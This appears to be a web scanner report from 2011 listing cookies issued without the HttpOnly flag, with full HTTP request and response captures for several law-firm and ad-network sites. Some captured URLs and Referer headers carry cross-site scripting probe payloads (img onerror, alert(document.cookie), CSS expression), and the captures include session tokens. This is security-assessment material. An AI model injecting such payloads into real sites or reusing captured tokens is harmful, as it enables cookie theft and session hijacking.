HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263646;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/ Set-Cookie: CFTOKEN=41801191;expires=Fri, 11-Jan-2041 15:08:47 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /chamber/memberDetail.asp HTTP/1.1 Host: www.dcchamber.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Wed, 19 Jan 2011 15:47:49 GMT Server: Apache/2.0.63 (Red Hat) Set-Cookie: PHPSESSID=r9mt7q2l6q33qih8ijabts6j75; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>DC Chamber of Commer ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showoffice.aspx HTTP/1.1 Host: www.ebglaw.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Connection: close Date: Wed, 19 Jan 2011 15:48:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /404.aspx?error=500 Set-Cookie: ASP.NET_SessionId=ld121hju5gt2vlvrg5m2cm45; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 136
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href='/404.aspx?error=500'>here</a>.</h2> </body></html>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:49:31 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A49%3A31%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D512%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:49:31 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dc HTTP/1.1 Host: www.fulbright.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFTOKEN=35971701;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A41%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A40%27%7D%23hitcount%3D3%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.16.1.67;expires=Fri, 11-Jan-2041 15:08:41 GMT;path=/ Content-Type: text/html; charset=UTF-8
<html> <head> <title>
The International Law Firm of Fulbright & Jaworski
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /index.cfm HTTP/1.1 Host: www.fulbright.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:48:35 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=24113095;path=/ Set-Cookie: CFTOKEN=35971701;path=/ Set-Cookie: CFCLIENT_WWW2=recentsearch%3D%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Set-Cookie: CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A48%3A35%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D6%23cftoken%3D35971701%23cfid%3D24113095%23;domain=.fulbright.com;expires=Fri, 11-Jan-2041 15:48:35 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.kasimer-ittig.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.political.cov.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 16:55:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title>Covington Political Broadcasting Law</title ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wps/portal/usa/rankings/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:08:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263656;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/ Set-Cookie: CFTOKEN=43582841;expires=Fri, 11-Jan-2041 15:08:55 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /cf?con=41cafe7%2B34f5e64%2Bb3b11e8&rand=1295459680369&sid=&xurl= HTTP/1.1 Host: ads.roiserver.com Proxy-Connection: keep-alive Referer: http://ads.roiserver.com/disp?pid=2DFE311&rand=22153025 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT SAdBuild: 400 P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml" Set-Cookie: sadsp-2DFE311="41cafe7/129545968,34f5e64/129545968,b3b11e8/129545968"; Version=1; Domain=ads.roiserver.com; Max-Age=87840; Expires=Thu, 20-Jan-2011 18:18:42 GMT; Path=/ Content-Type: image/gif Content-Length: 807 Date: Wed, 19 Jan 2011 17:54:42 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /click?clid=41cafe7&rand=1295459680368&sid= HTTP/1.1 Host: ads.roiserver.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sadsp-2DFE311="41cafe7/129545968,34f5e64/129545968,b3b11e8/129545968";
Response
HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Cache-Control: max-age=0,no-cache,no-store Pragma: no-cache Expires: Tue, 11 Oct 1977 12:34:56 GMT SAdBuild: 400 P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml" Set-Cookie: sadscpax=41cafe7-; Domain=ads.roiserver.com; Expires=Thu, 20-Jan-2011 18:29:21 GMT; Path=/ Location: http://clkrd.com/ad.php?o=acai Content-Length: 0 Date: Wed, 19 Jan 2011 18:05:21 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=6035991&rn=57307763&c7=http%3A%2F%2Fwww.yellowpages.com%2FWashington-DC74302%253Cimg%2520src%253da%2520onerror%253dalert(1)%253E9c7a66be0e0%2FAttorneys&c8=No%20Location%20Found%20-%20YP.com&c9=http%3A%2F%2Fburp%2Fshow%2F1&cv=2.2&cs=js HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(1)%3E9c7a66be0e0/Attorneys Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=1f00d615-24.143.206.88-1294170954
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Wed, 19 Jan 2011 15:26:51 GMT Connection: close Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 18-Jan-2013 15:26:51 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /OzoDB/cutils/R52_5/jsc/933/egc.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 6 Content-Type: application/x-javascript Set-Cookie: FFCap=1463B1219,174796:933,196008:0,0|0,11,1:0,17,1:0,16,0;expires=Fri, 18 Feb 2011 18:07:18 GMT;path=/;domain=.zedo.com; P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" X-Varnish: 2608430956 Cache-Control: max-age=2007212 Expires: Fri, 11 Feb 2011 23:40:50 GMT Date: Wed, 19 Jan 2011 18:07:18 GMT Connection: close
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fm.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 911 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "81ee0daa-82a5-4989a5927aac0" X-Varnish: 2233582065 2233582057 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=285 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:14 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1 Host: d7.zedo.com Proxy-Connection: keep-alive Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com; Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" Vary: Accept-Encoding X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=301 Expires: Wed, 19 Jan 2011 15:55:44 GMT Date: Wed, 19 Jan 2011 15:50:43 GMT Connection: close Content-Length: 2277
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
var p9=new Image();
var zzD=window.document;
if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=1;var zzPat='';var zzCusto ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /bar/v16-401/d3/jsc/fmr.js HTTP/1.1 Host: d7.zedo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; aps=1; ZEDOIDX=29; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1; FFcat=933,56,15:1099,2,14; ZFFAbh=749B826,20|1483_749#365; FFad=0:0; FFCap=1463B1219,174796:933,196008|0,11,1:0,17,1;
Response
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 912 Content-Type: application/x-javascript Set-Cookie: FFad=0:0:0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; Set-Cookie: FFcat=0,0,0:933,56,15:1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/; ETag: "812b9fe7-809a-4989a59833840" X-Varnish: 2233582316 P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=284 Expires: Wed, 19 Jan 2011 18:11:59 GMT Date: Wed, 19 Jan 2011 18:07:15 GMT Connection: close
// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.
The following cookie was issued by the application and does not have the HttpOnly flag set:
FFgeo=5386156;expires=Thu, 19 Jan 2012 15:50:46 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
ZFFAbh=749B826,20|1483_749#365;expires=Thu, 19 Jan 2012 15:50:47 GMT;domain=.zedo.com;path=/;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.csmonitor.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.csmonitor.com%2FUSA1edc1%2522-alert(document.cookie)-%25228a5e635d48%2FJustice%2F2011%2F0118%2FSupreme-Court-declines-appeal-of-D.C.-gay-marriage-law&ref=http%3A%2F%2Fburp%2Fshow%2F25&jdg4df HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh30.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; di=%7B%7D..1295378586.60|1293848200.66; dt=X; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 179 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Wed, 19 Jan 2011 15:51:10 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Fri, 18 Feb 2011 15:51:10 GMT; Path=/ Set-Cookie: di=%7B%7D..1295452270.19F|1295378586.60|1293848200.66; Domain=.addthis.com; Expires=Fri, 18-Jan-2013 12:57:24 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Wed, 19 Jan 2011 15:51:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 19 Jan 2011 15:51:10 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /404.aspx HTTP/1.1 Host: jonesdaydiversity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PortletId=0; SERVER_PORT=80; __utmz=21182496.1295451935.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/21; NavId=0; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; ZoneId=0; Mode=1; DefaultCulture=en-US; NSC_MC_KpoftEbz_b37b38_IUUQ=ffffffff09d5f63f45525d5f4f58455e445a4a423660; __utma=21182496.1025166527.1295451935.1295451935.1295451935.1; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; EventingStatus=1; __utmc=21182496; __utmb=21182496.2.10.1295451935; ASP.NET_SessionId=frpmkd55p5dmxt55rnepogqw; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1036&RootPortletID=616&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=FCW; SiteId=0;
The following cookie was issued by the application and does not have the HttpOnly flag set:
DefaultCulture=en-US; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /gateway/gw.js?csid=K08784&auto=t HTTP/1.1 Host: js.revsci.net Proxy-Connection: keep-alive Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; 